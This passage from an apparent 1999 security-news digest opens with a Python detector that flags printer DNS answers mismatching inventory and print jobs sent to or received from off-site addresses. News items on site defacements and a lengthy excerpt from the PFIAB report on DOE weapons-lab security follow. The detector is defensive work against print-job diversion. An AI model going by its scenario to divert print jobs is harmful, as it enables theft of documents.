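    DNS-cache-corruption scenario: every client that trusts the name will
    send its jobs to the substituted address."""
    expected = PRINTER_INVENTORY.get(hostname)
    findings = []
    for a in answers:
        if a == expected:
            continue
        where = "on-site" if on_site(a) else "off-site"
        findings.append(f"{hostname} resolves to {a} ({where}), "
                        f"inventory says {expected}")
    return findings


def parse_flow(line):
    """Parse a constructed flow record:
    '<ts> <src>:<sport> <dst>:<dport> <proto> <bytes>'."""
    ts, src, dst, proto, nbytes = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return {"ts": ts, "src": sip, "sport": int(sport), "dst": dip,
            "dport": int(dport), "proto": proto, "bytes": int(nbytes)}


def check_print_flows(lines):
    """Flag print-protocol flows that cross the site boundary: a job leaving
    for an off-site address (the outbound leg) or a printer accepting a job
    from an off-site source (the return leg the article describes)."""
    findings = []
    for line in lines:
        f = parse_flow(line)
        if f["proto"] != "tcp" or f["dport"] not in PRINT_PORTS:
            continue
        svc = PRINT_PORTS[f["dport"]]
        if not on_site(f["dst"]):
            findings.append(f"{f['ts']} {svc} job from {f['src']} sent "
                            f"off-site to {f['dst']} ({f['bytes']} bytes)")
        elif not on_site(f["src"]):
            findings.append(f"{f['ts']} {svc} job delivered to printer "
                            f"{f['dst']} from off-site {f['src']} "
                            f"({f['bytes']} bytes)")
    return findings


# Constructed sample data: a poisoned answer and four flow records.
SAMPLE_ANSWERS = ["203.0.113.77"]
SAMPLE_FLOWS = [
    "1999-06-10T14:02:11 192.0.2.17:1043 192.0.2.40:515 tcp 48213",    # normal local job
    "1999-06-10T14:05:40 192.0.2.17:1044 203.0.113.77:515 tcp 48213",  # job leaves the site
    "1999-06-10T14:06:02 203.0.113.77:2212 192.0.2.40:515 tcp 48213",  # relay returns it to the printer
    "1999-06-10T14:06:30 192.0.2.17:1045 192.0.2.40:80 tcp 1200",      # web UI, not a print port
]

if __name__ == "__main__":
    alerts = (check_printer_resolution("prn-bldg4.example.mil", SAMPLE_ANSWERS)
              + check_print_flows(SAMPLE_FLOWS))
    for msg in alerts:
        print("ALERT:", msg)
```

Run against the constructed data it raises three alerts: the resolver answer that does not match inventory, the outbound LPD flow to 203.0.113.77, and the LPD flow into the printer from that same off-site address. The second and third are the pair of legs the article's monitoring tools saw; the flow check catches them regardless of whether DNS or a router was what got tampered with, so it is the check to keep running.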
@HWA
60.0 Popular Singapore Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by lamer
Two high profile sites in Singapore were recently
defaced. MediaCity and Television Corporation Of
Singapore. Unfortunately no mirrors of either site are
available.
The Electric New Paper
http://newpaper.asia1.com.sg/spore/nplo05.html
(link dead)
@HWA
61.0 DOD Says it's CRAP! (Mustn't be Scottish)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
DOD Labels Software as 'Crap'
contributed by Code Kid
Art Money, senior civilian IT official for the Defense
Department, while speaking at the GovTechNet
International Conference in Washington, D.C, said "The
quality of software we're getting from vendors today is
crap, vendors are not building quality in."
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-crap-6-17-99.html
JUNE 17, 1999 . . . 15:17 EDT
Contractors' software 'crap,' says top DOD IT
official
BY BOB BREWIN (antenna@fcw.com)
The Pentagon's top information technology official sharply criticized, in the
plainest possible language, the quality of software that IT contractors currently
supply to the Defense Department.
"The quality of software we're getting from vendors today is crap," said Art
Money, senior civilian official, who is acting as assistant secretary of Defense
for command, control, communications and intelligence.
"Vendors are not building quality in," Money said today at the GovTechNet
International Conference in Washington, D.C. "We're finding holes in it."
DOD buys hundreds of millions of dollars worth of software each year,
including everything from shrink-wrapped packages designed to run on the
desktop to customized systems running millions of lines of code.
The quality of much of the software that DOD is receiving is so poor, Money
said, that he is worried about the future of the U.S. software industry. Money
predicted that if the U.S. software industry does not get its act together, it
could suffer the same fate as the U.S. automobile manufacturing industry, with
software sales moving offshore to Japan, for example.
@HWA
62.0 DOE Still Unsecure
~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Space Rogue
Even after one of the worst cases of spying in US
history a special investigative report has found that the
Department of Energy is not taking computer security
seriously. The report labels computer security practices
at DOE as "naive at best and dangerously irresponsible
at worst."
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-report-6-16-99.html
Science at its Best, Security at its Worst - DOE Security Report
http://jya.com/pfiab-doe.htm
Federal Computer Week;
JUNE 16, 1999 . . . 17:24 EDT
Cybersecurity holes persist at DOE labs, study
finds
BY DANIEL VERTON (dan_verton@fcw.com)
Despite what may be the worst spy case in U.S. history involving nuclear
weapon design data, the computer networks at the nation's five weapons
laboratories continue to be "riddled with vulnerabilities," according to a report
by a special investigative panel of intelligence and security officials.
According to the report, "Science at its Best, Security at its Worst," issued this
month by the President's Foreign Intelligence Advisory Board, midlevel
managers throughout the Energy Department have responded to the recent
Chinese spy scandal with a "business as usual" attitude, while foreign nationals
residing in "sensitive countries" continue to have unmonitored remote dial-up
access to lab networks.
The three-month study uncovered recurring problems with DOE's computer
security program, including poor labeling and tracking of computer media,
problems with lax password enforcement on laboratory computer
workstations and a significant failure to control access to sensitive and
classified networks.
Computer security methods throughout DOE over the last two decades have
been "naive at best and dangerously irresponsible at worst," the report said. In
fact, "computer systems at some DOE facilities were so easy to access that
even department analysts likened them to 'automatic teller machines,'
[allowing] unauthorized withdrawals at our nation's expense," the report said.
Security audits also uncovered what the report calls "remarkable" lapses in
addressing security problems and procedural gaps at many DOE labs.
According to the report, it took DOE 31 months to write and approve a
network security plan, 24 months to order security labels for mislabeled
software, 20 months to ensure that improperly stored classified computer
media had been safeguarded and 51 months to properly safeguard
cryptographic material used to secure telephones. It even took 11 months to
remove a deceased employee from classified document access lists, according
to the report.
The report also outlined instances of classified information being placed on
unclassified networks well after the department had developed a corrective
action plan in July 1998. "The predominant attitude toward security and
counterintelligence among many DOE and lab managers has ranged from
half-hearted, grudging accommodation to smug disregard," the report
concluded.
-=-
** A few diagrams were omitted from this report, go to the url at jya
to see the report with diagrams (they're most useful NOT)... - Ed
[Congressional Record: June 21, 1999 (Digest)]
From the Congressional Record Online via GPO Access [wais.access.gpo.gov]
Monday, June 21, 1999
Daily Digest
Senate
COMMITTEE MEETINGS FOR TUESDAY,
JUNE 22, 1999
(Committee meetings are open unless otherwise indicated)
Senate
Committee on Armed Services: with the Select Committee on Intelligence,
and with the Committee on Energy and Natural Resources, and with the
Committee on Governmental Affairs, to hold joint hearings on the
President's Foreign Intelligence Advisory Board's report to the
President: Science at its Best; Security at its Worst: A Report on
Security Problems at the U.S. Department of Energy, 9:30 a.m., SD-106.
Source: Report of the President's Foreign Intelligence Advisory Board, "Science At Its Best, Security At Its Worst: A Report on Security Problems at
the U.S. Department of Energy," June 1999 (released 15 June 1999 by the White House Office of the PFIAB):
http://www.whitehouse.gov/WH/EOP/pfiab/pfiab_report.pdf (72 pages; 420K)
Unclassified Appendix to PFIAB Report:
http://www.whitehouse.gov/WH/EOP/pfiab/appendix.pdf (34 pages; 191K)
SCIENCE AT ITS BEST
__________________________
SECURITY AT ITS WORST
A Report on Security Problems at the
U.S. Department of Energy
[Presidential Seal]
____________________________
A Special Investigative Panel
President’s Foreign Intelligence Advisory Board
JUNE 1999
ABSTRACT
On March 18, 1999, President William J. Clinton requested that the President’s Foreign Intelligence Advisory Board (PFIAB) undertake an inquiry and issue a
report on “the security threat at the Department of Energy’s weapons labs and the adequacy of the measures that have been taken to address it.”
Specifically, the President asked the PFIAB to “address the nature of the present counterintelligence security threat, the way in which it has evolved over the last two
decades and the steps we have taken to counter it, as well as to recommend any additional steps that may be needed.” He also asked the PFIAB “to deliver its
completed report to the Congress, and to the fullest extent possible consistent with our national security, release an unclassified version to the public.”
In response, the Honorable Warren B. Rudman, Chairman of PFIAB, appointed board members Ms. Ann Z. Caracristi, Dr. Sidney Drell, and Mr. Stephen
Friedman to form the Special Investigative Panel and obtained detailees from several federal agencies (CIA, DOD, FBI) to augment the work of the PFIAB staff.
Over the past three months, the panel and staff interviewed more than 100 witnesses, reviewed more than 700 documents encompassing thousands of pages, and
conducted onsite research and interviews at five of the Department of Energy’s national laboratories and plants: Livermore, Los Alamos, Oak Ridge, Pantex, and
Sandia.
The panel has produced a report and an appendix of supporting documents, both of which are unclassified to the fullest extent possible. A large volume of classified
material, which was also reviewed and distilled for this report, has been relegated to a second appendix that is available only to authorized recipients. This report
examines:
The 20–year history of security and counterintelligence issues at the DOE national laboratories, with an emphasis on the five labs that focus on
weapons–related research;
The inherent tension between security concerns and scientific freedom at the labs and its effect on the institutional culture and efficacy of the
Department;
The growth and evolution of the foreign intelligence threat to the national labs, particularly in connection with the Foreign Visitor’s Program of the labs;
The implementation and effectiveness of Presidential Decision Directive No. 61, the reforms instituted by Secretary of Energy Bill Richardson, and
other related initiatives; and,
Additional measures that should be taken to improve security and counterintelligence at the labs.
PANEL MEMBERS
The Honorable Warren B. Rudman, Chairman of the President’s Foreign Intelligence Advisory Board. Senator Rudman is a partner in the law firm of Paul,
Weiss, Rifkind, Wharton, and Garrison. From 1980 to 1992, he served in the U.S. Senate, where he was a member of the Select Committee on Intelligence.
Previously, he was Attorney General of New Hampshire.
Ms. Ann Z. Caracristi, board member. Ms. Caracristi, of Washington, DC, is a former Deputy Director of the National Security Agency, where she served in a
variety of senior management positions over a 40–year career. She is currently a member of the DCI/Secretary of Defense Joint Security Commission and recently
chaired a DCI Task Force on intelligence training. She was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community.
Dr. Sidney D. Drell, board member. Dr. Drell, of Stanford, California is an Emeritus Professor of Theoretical Physics and a Senior Fellow at the Hoover
Institution. He has served as a scientific consultant and advisor to several congressional committees, The White House, DOE, DOD, and the CIA. He is a member
of the National Academy of Sciences and a past President of the American Physical Society.
Mr. Stephen Friedman, board member. Mr. Friedman is Chairman of the Board of Trustees of Columbia University and a former Chairman of Goldman, Sachs,
& Co. He was a member of the Aspin/Brown Commission on the Roles and Capabilities of the Intelligence Community and the Jeremiah Panel on the National
Reconnaissance Office.
PFIAB STAFF
Randy W. Deitering, Executive Director
Mark F. Moynihan, Assistant Director
Roosevelt A. Roy, Administrative Officer
Frank W. Fountain, Assistant Director and Counsel
Brendan G. Melley, Assistant Director
Jane E. Baker, Research/Administrative Officer
PFIAB ADJUNCT STAFF
Roy B., Defense Intelligence Agency
Karen DeSpiegelaere, Federal Bureau of Investigation
Jerry L., Central Intelligence Agency
Christine V., Central Intelligence Agency
David W. Swindle, Department of Defense, Naval Criminal Investigative Service
Joseph S. O’Keefe, Department of Defense, Office of the Secretary of Defense
TABLE OF CONTENTS
FOREWORD
FINDINGS
ROOT CAUSES
An International Enterprise
Big, Byzantine, and Bewildering Bureaucracy
Lack of Accountability
Culture and Attitudes
Changing Times, Changing Missions
RECURRING VULNERABILITIES
Management and Planning
Physical Security
Screening and Monitoring Personnel
Protection of Classified and Sensitive Information
Tracking Nuclear Materials
Foreign Visitors’ Program
ASSESSMENTS
Responsibility
Record of the Clinton Team
The 1995 “Walk-In” Document
W-88 Investigation
Damage Assessment
PDD-61: Birth and Intent
Timeliness of PDD-61
Secretary Richardson’s Initiatives
Prospects for Reforms
Trouble Ahead
Back to the Future
REORGANIZATION
Leadership
Restructuring
RECOMMENDATIONS
ENDNOTES
APPENDIX
Map of DOE Installations
Chronology of Events
Chronology of Reports on DOE
Damage Assessment of China’s Acquisition of U.S. Nuclear Information
Presidential Decision Directive 61
Bibliography
FOREWORD FROM THE SPECIAL INVESTIGATIVE PANEL
For the past two decades, the Department of Energy has embodied science at its best and security of secrets at its worst.
Within DOE are a number of the crown jewels of the world’s government–sponsored scientific research and development organizations. With its record as the
incubator for the work of many talented scientists and engineers—including many Nobel prize winners—DOE has provided the nation with far–reaching advantages.
Its discoveries not only helped the United States to prevail in the Cold War, they undoubtedly will continue to provide both technological benefits and inspiration for
the progress of generations to come. The vitality of its national laboratories is derived to a great extent from their ability to attract talent from the widest possible
pool, and they should continue to capitalize on the expertise of immigrant scientists and engineers. However, we believe that the dysfunctional structure at the heart of
the Department has too often resulted in the mismanagement of security in weapons–related activities and a lack of emphasis on counterintelligence.
DOE was created in 1977 and heralded as the centerpiece of the federal solution to the energy crisis that had stunned the American economy. A vital part of this
new initiative was the Energy Research and Development Administration (ERDA), the legacy agency of the Atomic Energy Commission (AEC) and inheritor of the
national programs to develop safe and reliable nuclear weapons. The concept, at least, was straightforward: take the diverse and dispersed energy research centers
of the nation, bring them under an umbrella organization with other energy–related enterprises, and spark their scientific progress through closer contacts and
centralized management.
However, the brilliant scientific breakthroughs at the nuclear weapons laboratories came with a very troubling record of security administration. For example,
classified documents detailing the designs of the most advanced nuclear weapons were found on library shelves accessible to the public at the Los Alamos
laboratory. Employees and researchers were receiving little, if any, training or instruction regarding espionage threats. Multiple chains of command and standards of
performance negated accountability, resulting in pervasive inefficiency, confusion, and mistrust. Competition among laboratories for contracts, and among researchers
for talent, resources, and support distracted management from security issues. Fiscal management was bedeviled by sloppy accounting. Inexact tracking of the
quantities and flows of nuclear materials was a persistent worry. Geographic decentralization fractured policy implementation and changes in leadership regularly
depleted the small reservoirs of institutional memory. Permeating all of these issues was a prevailing cultural attitude among some in the DOE scientific community
that regarded the protection of nuclear know–how with either fatalism or naiveté.
Twenty years later, every one of these problems still existed. Most still exist today.
In response to these problems, the Department has been the subject of a nearly unbroken history of dire warnings and attempted but aborted reforms. A cursory
review of the open-source literature on the DOE record of management presents an abysmal picture. Second only to its world–class intellectual feats has been its
ability to fend off systemic change. Over the last dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. No
President, Energy Secretary, or Congress has been able to stem the recurrence of fundamental problems. All have been thwarted time after time by the intransigence
of this institution. The Special Investigative Panel found a large organization saturated with cynicism, an arrogant disregard for authority, and a staggering pattern of
denial. For instance, even after President Clinton issued Presidential Decision Directive 61 ordering that the Department make fundamental changes in security
procedures, compliance by Department bureaucrats was grudging and belated.
Time after time over the past few decades, officials at DOE headquarters and the weapons labs themselves have been presented with overwhelming evidence that
their lackadaisical oversight could lead to an increase in the nuclear threat against the United States. Throughout its history, the Department has been the subject of
scores of critical reports from the General Accounting Office (GAO), the intelligence community, independent commissions, private management consultants, its
Inspector General, and its own security experts. It has repeatedly attempted reforms. Yet the Department’s ingrained behavior and values have caused it to continue
to falter and fail.
PROSPECTS FOR REFORMS
We believe that Secretary of Energy Richardson, in attempting to deal with many critical security matters facing the Department, is on the right track in some, though
not all, of his changes. We concur with and encourage many of his recent initiatives, and we are heartened by his aggressive approach and command of the issues.
But we believe that he has overstated the case when he asserts, as he did several weeks ago, that “Americans can be reassured: our nation’s nuclear secrets are,
today, safe and secure.”
After a review of more than 700 reports and studies, thousands of pages of classified and unclassified source documents, interviews with scores of senior federal
officials, and visits to several of the DOE laboratories at the heart of this inquiry, the Special Investigative Panel has concluded the Department of Energy is incapable
of reforming itself—bureaucratically and culturally—in a lasting way, even under an activist Secretary.
The panel has found that DOE and the weapons laboratories have a deeply rooted culture of low regard for and, at times, hostility to security issues, which has
continually frustrated the efforts of its internal and external critics, notably the GAO and the House Energy and Commerce Committee. Therefore, a reshuffling of
offices and lines of accountability may be a necessary step toward meaningful reform, but it almost certainly will not be sufficient.
Even if every aspect of the ongoing structural reforms is fully implemented, the most powerful guarantor of security at the nation’s weapons laboratories will not be
laws, regulations, or management charts. It will be the attitudes and behavior of the men and women who are responsible for the operation of the labs each day.
These will not change overnight, and they are likely to change only in a different cultural environment—one that values security as a vital and integral part of
day–to–day activities and believes it can coexist with great science.
We are convinced that when Secretary Richardson vacates the office his successor is not likely to have a comparable appreciation of the gravity of the Department’s
past problems, nor a comparable interest in resolving them. The next Secretary of Energy will not have spent months at the tip of the sword created by the recent
public outcry over DOE mismanagement of national secrets. Indeed, the core of the Department’s bureaucracy is quite capable of undoing Secretary Richardson’s
reforms, and may well be inclined to do so if given the opportunity.
Ultimately, the nature of the institution and the structure of the incentives under a culture of scientific research require great attention if they are to be made compatible
with the levels of security and the degree of command–and–control warranted where the research and stewardship of nuclear weaponry is concerned. Yet it must be
done.
THE PFIAB INQUIRY
The PFIAB panel is fully aware of the many recent allegations of management failures surrounding the Department of Energy and questions about the subsequent
roles of entities such as the Department of Justice, the Federal Bureau of Investigation, and the Central Intelligence Agency. Much of the research we conducted has
relevance to these allegations. However, the depth and the complexity of the issues call for examinations by institutions with greater resources and a wider charter:
namely, Congress and standing executive agencies of the federal government.
In the 90 days of our inquiry, the PFIAB panel conducted numerous interviews with senior federal officials who agreed to speak candidly—with the understanding
that they would not be identified by name—about DOE’s problems and recent events. On balance, the panel finds that some very damaging security compromises
may have occurred, as alleged by some in recent weeks. But we believe that in matters of intelligence and counterintelligence, one cannot brush off the reality that
conclusions are often intrinsically based on probabilities, rather than certainties.
Leaders, of course, are often obliged to act, and should act, based on the probability of impending danger, not only its certainty. And those entrusted with the public
weal are indisputably served better by having more information about risks than less. So the panel would like to note the contributions of those who have helped to
raise the public’s awareness of the risks to national security posed by problems at DOE. Although we do not concur with all of their conclusions, we believe that
both intelligence officials at the Department of Energy and the members of the Cox Committee made substantial and constructive contributions to understanding and
resolving security problems at DOE. As we note later in this report, we concur on balance with the damage assessment of espionage losses conducted by the
Director of Central Intelligence. We also concur with the findings of the independent review of that assessment by Admiral David Jeremiah and his panel.
Our mandate from President Clinton was restricted to an analysis of the structural and management problems in the Department’s security and counterintelligence
operations. We abided by that. We also recognize the unique nature of the assignment given to us by the President. Never before in its history of more than 35 years
has the PFIAB prepared a report for release to the general public. As a result, we have taken pains to ensure that the language of this report is “plain English,” not
bureaucratese, and that the findings of the report are stated directly and candidly, not with the indirection and euphemisms often employed by policy insiders.
SOLUTIONS
Our panel has concluded that the Department of Energy, when faced with a profound public responsibility, has failed. Therefore, this report suggests two alternative
organizational solutions, both of which we believe would substantially insulate the weapons laboratories from many of DOE’s historical problems and promote the
building of a responsible culture over time. We also offer recommendations for improving various aspects of security and counterintelligence at DOE, such as
personnel assurance, cyber–security, program management, and interdepartmental cooperation under the Foreign Intelligence Surveillance Act of 1978.
The weapons research and stockpile management functions should be placed wholly within a new semi–autonomous agency within DOE that has a clear mission,
streamlined bureaucracy, and drastically simplified lines of authority and accountability. Useful lessons along these lines can be taken from the National Security
Agency (NSA) or Defense Advanced Research Projects Agency (DARPA) within the Department of Defense or the National Oceanographic and Atmospheric
Administration (NOAA) within the Department of Commerce. The other alternative is a wholly independent agency, such as the National Aeronautics and Space
Administration (NASA). There was substantial debate among the members of the panel about these two alternatives. Both have strengths and weaknesses. In the
final analysis, the decision rests in the hands of the President and the Congress, and we trust that they will give serious deliberation to the merits and shortcomings of
the alternatives before enacting major reforms. We all agree, nonetheless, that the labs should never be subordinated to the Department of Defense.
With either proposal it will be important for the weapons labs to maintain effective scientific contact on nonclassified scientific research with the other DOE labs and
the wider scientific community. To do otherwise would work to the detriment of the nation’s scientific progress and security over the long run. This argument draws
on history: nations that honor and advance freedom of inquiry have fared better than those who have sought to arbitrarily suppress and control the community of
science.
__________________________________
The nuclear weapons and research functions of DOE need more autonomy,
a clearer mission, a streamlined bureaucracy, and increased accountability.
__________________________________
However, we would submit that we do not face an either/or proposition. The past 20 years have provided a controlled experiment of a sort, the results of which
point to institutional models that hold promise. Organizations such as NASA and DARPA have advanced scientific and technological progress while maintaining a
respectable record of security. Meanwhile, the Department of Energy, with its decentralized structure, confusing matrix of cross–cutting and overlapping
management, and shoddy record of accountability has advanced scientific and technological progress, but at the cost of an abominable record of security with deeply
troubling threats to American national security.
Thomas Paine once said that “government, even in its best state, is but a necessary evil; in its worst state, an intolerable one.” This report finds that DOE’s
performance, throughout its history, should have been regarded as intolerable.
We believe the results and implications of this experiment are clear. It is time for the nation’s leaders to act decisively in the defense of America’s national security.
Warren Rudman
Chairman of the President’s Foreign
Intelligence Advisory Board
Ms. Ann Caracristi
Board Member
Dr. Sidney Drell
Board Member
Mr. Stephen Friedman
Board Member
FINDINGS
On March 18, 1999, President Clinton tasked the Foreign Intelligence Advisory Board to review the history of the security and counterintelligence threats to the
nation’s weapons labs and the effectiveness of the responses by the U.S. government. He also asked the Board to propose further improvements.
This report, based on reviews of hundreds of source documents and studies, analysis of intelligence reports, and scores of interviews with senior level officials from
several administrations, was prepared over the past 90 days in fulfillment of the President’s request.
BOTTOM LINE
Our bottom line: DOE represents the best of America’s scientific talent and achievement, but it has also been responsible for the worst security record on secrecy
that the members of this panel have ever encountered.
The national labs of the Department of Energy are among the crown jewels of the world’s government–sponsored scientific research and development organizations.
With its record as the incubator for the work of many talented scientists and engineers—including many Nobel prize winners—it has provided the nation with
far–reaching advantages. Its discoveries not only helped the United States to prevail in the Cold War, they will undoubtedly provide both technological benefits and
inspiration for the progress of generations to come. Its vibrancy is derived to a great extent from its ability to attract talent from the widest possible pool, and it
should continue to capitalize on the expertise of immigrant scientists and engineers. However, the Department has devoted far too little time, attention, and resources
to the prosaic but grave responsibilities of security and counterintelligence in managing its weapons and other national security programs.
FINDINGS
The preponderance of evidence accumulated by the Special Investigative Panel, spanning the past 25 years, has compelled the members to reach many definite
conclusions—some very disturbing—about the security and well–being of the nation’s weapons laboratories.
As the repository of America’s most advanced know-how in nuclear and related armaments and the home of some of America’s finest scientific
minds, these labs have been and will continue to be a major target of foreign intelligence services, friendly as well as hostile. Two landmark events, the
end of the Cold War and the overwhelming victory of the United States and its allies in the Persian Gulf War, markedly altered the security equations and outlooks of
nations throughout the world. Friends and foes of the United States intensified their efforts to close the technological gap between their forces and those of America,
and some redoubled their efforts in the race for weapons of mass destruction. Under the restraints imposed by the Comprehensive Test Ban Treaty, powerful
computers have replaced detonations as the best available means of testing the viability and performance capabilities of new nuclear weapons. So research done by
U.S. weapons laboratories with high performance computers stands particularly high on the espionage hit list of other nations, many of which have used increasingly
more sophisticated and diverse means to obtain the secrets necessary to join the nuclear club.
______________________________________
Snapshot: DOE Weapons Operations

Percentage of Budget: Roughly $6 billion, a third of the
Department’s $18 billion FY99 budget.

Allocation of Weapons-Related Budget ($ billion):
  Defense Programs              4.4
  Nonproliferation/Nat. Sec.    0.7
  Fissile Material Disposal     0.2
  Naval Reactors                0.7

Number of Contract Employees: 34,190

Number of Contract Employees Per Lab:
  Los Alamos          6,900
  Sandia              7,500
  L. Livermore        6,400
  Pantex              2,860
  Oak Ridge (Y-12)    5,500
  Kansas City         3,150
  Nevada Test Site    1,880

SOURCE: DEPT. OF ENERGY FIELD FACTBOOK, MAY 1998
______________________________________
More than 25 years worth of reports, studies and formal inquiries—by executive branch agencies, Congress, independent panels, and even DOE
itself—have identified a multitude of chronic security and counterintelligence problems at all of the weapons labs (See Appendix). These reviews
produced scores of stern, almost pleading, entreaties for change. Critical security flaws—in management and planning, personnel assurance, some physical security
areas, control of nuclear materials, protection of documents and computerized information, and counterintelligence—have been cited for immediate attention and
resolution … over and over and over … ad nauseam.
The open–source information alone on the weapons laboratories overwhelmingly supports a troubling conclusion: their security and
counterintelligence operations have been seriously hobbled and relegated to low-priority status for decades. The candid, closed–door testimony of
current and former federal officials as well as the content of voluminous classified materials received by this panel in recent weeks reinforce this conclusion. When it
comes to a genuine understanding of and appreciation for the value of security and counterintelligence programs, especially in the context of America’s nuclear
arsenal and secrets, the DOE and its weapons labs have been Pollyannaish. The predominant attitude toward security and counterintelligence among many DOE and
lab managers has ranged from half–hearted, grudging accommodation to smug disregard. Thus the panel is convinced that the potential for major leaks and thefts of
sensitive information and material has been substantial. Moreover, such security lapses would have occurred in bureaucratic environments that would have allowed
them to go undetected with relative ease.
Organizational disarray, managerial neglect, and a culture of arrogance—both at DOE headquarters and the labs themselves—conspired to create
an espionage scandal waiting to happen. The physical security efforts of the weapons labs (often called the “guns, guards, and gates”) have had some isolated
shortcomings, but on balance they have developed some of the most advanced security technology in the world. However, perpetually weak systems of personnel
assurance, information security, and counterintelligence have invited attack by foreign intelligence services. Among the defects this panel found:
- Inefficient personnel clearance programs, wherein haphazard background investigations could take years to complete and the backlogs numbered in the
  tens of thousands.
- Loosely controlled and casually monitored programs for thousands of unauthorized foreign scientists and assignees—despite more than a decade of
  critical reports from the General Accounting Office, the DOE Inspector General, and the intelligence community. This practice occasionally created
  bizarre circumstances in which regular lab employees with security clearances were supervised by foreign nationals on temporary assignment.
- Feckless systems for control of classified documents, which periodically resulted in thousands of documents being declared lost.
- Counterintelligence programs with part–time CI officers, who often operated with little experience, minimal budgets, and employed little more than
  crude “awareness” briefings of foreign threats and perfunctory and sporadic debriefings of scientists travelling to foreign countries.
- A lab security management reporting system that led everywhere but to responsible authority.
- Computer security methods that were naive at best and dangerously irresponsible at worst.
Why were these problems so blatantly and repeatedly ignored? DOE has had a dysfunctional management structure and culture that only occasionally gave proper
credence to the need for rigorous security and counterintelligence programs at the weapons labs. For starters, there has been a persisting lack of real leadership and
effective management at DOE.
The nature of the intelligence–gathering methods used by the People’s Republic of China poses a special challenge to the U.S. in general and the
weapons labs in particular. More sophisticated than some of the blatant methods employed by the former Soviet bloc espionage services, PRC intelligence
operatives know their strong suits and play them extremely well. Increasingly more nimble, discreet and transparent in their spying methods, the Chinese services
have become very proficient in the art of seemingly innocuous elicitations of information. This modus operandi has proved very effective against unwitting and
ill–prepared DOE personnel.
Despite widely publicized assertions of wholesale losses of nuclear weapons technology from specific laboratories to particular nations, the factual
record in the majority of cases regarding the DOE weapons laboratories supports plausible inferences—but not irrefutable proof—about the source
and scope of espionage and the channels through which recipient nations received information. The panel was not charged, nor was it empowered, to
conduct a technical assessment regarding the extent to which alleged losses at the national weapons laboratories may have directly advanced the weapons
development programs of other nations. However, the panel did find these allegations to be germane to issues regarding the structure and effectiveness of DOE
security programs, particularly the counterintelligence functions.
The classified and unclassified evidence available to the panel, while pointing out systemic security vulnerabilities, falls short of being conclusive. The actual damage
done to U.S. security interests is, at the least, currently unknown; at worst, it may be unknowable. Numerous variables are inescapable. Analysis of indigenous
technology development in foreign research laboratories is fraught with uncertainty. Moreover, a nation that is a recipient of classified information is not always the
sponsor of the espionage by which it was obtained. However, the panel does concur, on balance, with the findings of the recent DCI–sponsored damage
assessment. We also concur with the findings of the subsequent independent review, led by retired Admiral David Jeremiah, of that damage assessment.
The Department of Energy is a dysfunctional bureaucracy that has proven it is incapable of reforming itself. Accountability at DOE has been spread so
thinly and erratically that it is now almost impossible to find. The long traditional and effective method of entrenched DOE and lab bureaucrats is to defeat security
reform initiatives by waiting them out. They have been helped in this regard by the frequent changes in leadership at the highest levels of DOE—nine Secretaries of
Energy in 22 years. Eventually, the reform–minded management transitions out, either due to a change in administrations or as a result of the traditional “revolving
door” management practices at DOE. Then the bureaucracy reverts to old priorities and predilections. Such was the case in December 1990 with the reform
recommendations carefully crafted by a special task force commissioned by then–Energy Secretary Watkins. The report skewered DOE for unacceptable
“direction, coordination, conduct, and oversight” of safeguards and security. Two years later, the new administration rolled in, redefined priorities, and the initiatives
all but evaporated. Deputy Secretary Charles Curtis in late 1996 investigated clear indications of serious security and CI problems and drew up a list of initiatives in
response. Those initiatives also were dropped after he left office.
Reorganization is clearly warranted to resolve the many specific problems with security and counterintelligence in the weapons laboratories, but
also to address the lack of accountability that has become endemic throughout the entire Department. Layer upon layer of bureaucracy, accumulated
over the years, has diffused responsibility to the point where scores claim it, no one has enough to make a difference, and all fight for more. Convoluted, confusing,
and often contradictory reporting channels make the relationship between DOE headquarters and the labs, in particular, tense, internecine, and chaotic. In between
the headquarters and the laboratories are field offices, which the panel found to be a locus of much confusion. In background briefings of the panel, senior DOE
officials often described them as redundant operations that function as a shadow headquarters, often using their political clout and large payrolls to push their own
agendas and budget priorities in Congress. Even with the latest DOE restructuring, the weapons labs are reporting to far too many DOE masters.
The criteria for the selection of Energy Secretaries have been inconsistent in the past. Regardless of the outcome of ongoing or contemplated
reforms, the minimum qualifications for an Energy Secretary should include experience in not only energy and scientific issues, but national
security and intelligence issues as well. The list of former Secretaries, Deputy Secretaries, and Under Secretaries meeting all of these criteria is very short.
Despite having a large proportion of its budget (roughly 30 percent) devoted to functions related to nuclear weapons, the Department of Energy has often been led
by men and women with little expertise and background in national security. The result has been predictable: security issues have been a low priority, and leaders
unfamiliar with these issues have delegated decisionmaking to lesser–ranking officials who lacked the incentives and authority to address problems with dispatch and
forcefulness. For a Department in desperate need of strong leadership on security issues, this has been a disastrous trend. The bar for future nominees at the upper
levels of the Department needs to be raised significantly.
DOE cannot be fixed with a single legislative act: management must follow mandate. The research functions of the labs are vital to the nation’s
long term interest, and instituting effective gates between weapons and nonweapons research functions will require both disinterested scientific
expertise, judicious decisionmaking, and considerable political finesse. Thus both Congress and the executive branch—whether along the lines suggested by
the Special Investigative Panel or others—should be prepared to monitor the progress of the Department’s reforms for years to come. This panel has no illusions
about the future of security and counterintelligence at DOE. There is little reason to believe future DOE Secretaries will necessarily share the resolve of Secretary
Richardson, or even his interest. When the next Secretary of Energy is sworn in, perhaps in the spring of 2001, the DOE and lab bureaucracies will still have
advantages that could give them the upper hand: time and proven skills at artful dodging and passive intransigence.
The Foreign Visitors’ and Assignments Program has been and should continue to be a valuable contribution to the scientific and technological
progress of the nation. Foreign nationals working under the auspices of U.S. weapons labs have achieved remarkable scientific advances and contributed
immensely to a wide array of America’s national security interests, including nonproliferation. Some have made contributions so unique that they are all but
irreplaceable. The value of these contacts to the nation should not be lost amid the attempt to address deep, well–founded concerns about security lapses. That said,
DOE clearly requires measures to ensure that legitimate use of the research laboratories for scientific collaboration is not an open door to foreign espionage agents.
Losing national security secrets should never be accepted as an inevitable cost of obtaining scientific knowledge.
